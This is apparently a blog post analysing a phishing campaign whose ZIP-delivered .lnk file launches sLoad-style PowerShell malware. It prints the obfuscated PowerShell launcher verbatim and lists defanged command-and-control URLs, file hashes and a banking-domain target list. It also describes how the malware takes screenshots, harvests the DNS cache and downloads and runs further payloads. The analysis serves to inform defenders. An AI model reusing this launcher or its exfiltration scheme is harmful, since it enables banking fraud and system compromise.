Virus e-mail using stolen personal details

A lot of effort has gone into this infection attempt.

First, stolen information (recipients full name, address and telephone number) appear in the initial inbound e-mail into the victim.

powershell malware 1.png

When you click the link it hops through (not even sure how they allow this!) a McAfee reputation service domain.. which forwards you onto the malware domain.

hxxps://landscapenhancements.com/.advice-notification/order-complete-details

The above page then provides you with a ZIP file that changes slightly each time (contains a different image file in the ZIP along with a windows .lnk file).

“order-complete-details.zip” containing “order-complete-details.lnk”.
The .lnk file, when clicked, runs:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $j="powershell -win hidden -c findstr /s dopretane $env:userprofile\*.lnk > $env:userprofile\Downloads\sent"."ps1; & $env:userprofile\Downloads\sent"."ps1"; start-process $j

This is come fairly clever code that seems to search the entire user folder for the malicious .lnk file and extracts a powershell script embedded at the end of the .lnk.

powershell malware 2.png

Ignoring all the obfuscation the script essentially downloads another script from

hxxps://kylemendez.com/lem/dez

SHA256: f37277141eb75037227e8ad006a64a2be41719167d297b61a049a6e6e3c810c5

 

However.. this server will only send you a file if you download it using the “BITS” service built into windows. If you request it with a browser you get an error message and the server then stops responding to any further requests.

Upon successful download of the URL your computer is given another powershell script. This one then requests further URLs using BITS.

hxxps://qasarer.eu/sload/2.0/p2.ps1

SHA256: 6cd88c0fc53964d73cef4fd202bd4ec64eaccdf93e93646af05bd2140a9f0628

 

hxxps://qasarer.eu/sload/2.0/hostp1.txt

SHA256: bcc4189cfdf1740d3e6190b0e7d435c8e81bc8074aacb0427bfbcabf85245faf
Content..

https://qasarer.eu/sload/,https://leasghler.eu/sload/

It then “ConvertTo-SecureString”‘s the files and stores it as config.ini and web.ini.

When these files are run it does further file fetches of:

hxxps://qasarer.eu/sload//gate.php?ch=1

A file containing just “sok” SHA256: ffa67ff84b797f1b99d6510d5f57e281ac0364228660497f2dac9a24b1b57cb8

 

and

hxxps://leasghler.eu/sload//gate.php?ch=1

A file of the same content as above.

 

It looks a bit like these are used as flags. If two sok’s are returned the powershell script will continue. If 60 seconds have passed and two sok’s are not returned it seems to kill the powershell process and end execution.

The next step is enumeration of the mapped network drives on the system into a variable ($dd) then seems to parse the strings into something a bit like json in $outD.

Lots of UK bank name variables are then loaded into an array:

$b = @("intesasanpaolo","inbank","unicredit","nwolb.com","bankline","bankofscotland.co.uk","bankofscotland.co.uk","secure.lloydsbank.co.uk","secure.halifax-online.co.uk","hsbc.co.uk","rbsdigital.com","barclays.co.uk","onlinebusiness.lloydsbank","tsb.co.uk","retail.santander.co.uk","business.santander.co.uk","onlinebanking.nationwide.co.uk");

The script takes 4 screenshots 40 seconds apart and saves them as “ScreenCaptureX” where X is 0 through 3.

$tt is loaded with the list of running processes (exe files that are currently running).
$dn is loaded with the cache of recent DNS hosts the computer has accessed (This will contain most websites and mailservers etc.. that have been recently accessed).
All this information is then posted to one of the two hostnames contained within the previous request to hostp1.txt.

hxxps://qasarer.eu/sload/gate.php?g=pu&[variables here]

The request above also includes a variable named “bu” which highlights if any of the above banking hostnames have appeared in the DNS cache. I.e. the hacker can collect data on which banks a specific infection has been visiting.
This URL then returns a command or “0”.

 

The command can be:

* run=
Downloads a file and runs it.
* updateps=
Looks like an auto update function for the malware
* updatehost=
Updates the host names that are used for command and control
* anything else with a length longer than 3 characters will delete all the screenshots and then initiate another download from the URL given in the http response and then save and run it as a .exe file. Looks like a function to deploy further malware. ***SEE FURTHER BELOW REF1***
This command also then takes 6 more screenshots.

The next step, if none of the above are triggered, is to upload the screenshots that have been taken and then delete them from the disk using the following url on the Command and Control servers indicated in hostp1.txt

hxxps://qasarer.eu/sload/s.php?n=MACHINENAME&id=WINDOWSUUID&i=screenshotnumber&s=randomid

Logic code is also written into the powershell script to check the bits queue to make sure all pending uploads have been completed before it moves on!

 

It then sleeps for 10 minutes and runs everything above again on an infinite loop with 10 minute pauses.

***REF1***

If a banking url is identified in the “bu” variable (for example *hsbc.co.uk) then I managed to trigger the response “hxxps://afrigat.eu/sload/dedem/faq.txt” (and “hxxps://qasarer.eu/sload/dedem/faq.txt”)
SHA256: 27e281b4dfefc0746e3c84e83f8db58a9710344a3d33edf670d61950d648d781

VirusTotal started to scan the file.. then after a few results (some of which came up with SpyEyes or Ramnit (possibly part of the Zeus banking malware family?)) VirusTotal blanked the screen and came up with this unusual message.state malware maybe.png

However revisiting the page did return some results.
Some other indicators of this malware are “C:\necessi\Release\cheats.pdb” and “2b62a720-3ed1-47f8-bb98-d13fff48bc70”

Someone else has done pretty much the same digging into this malware with an almost identical blog post ;)

Advertisement
This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s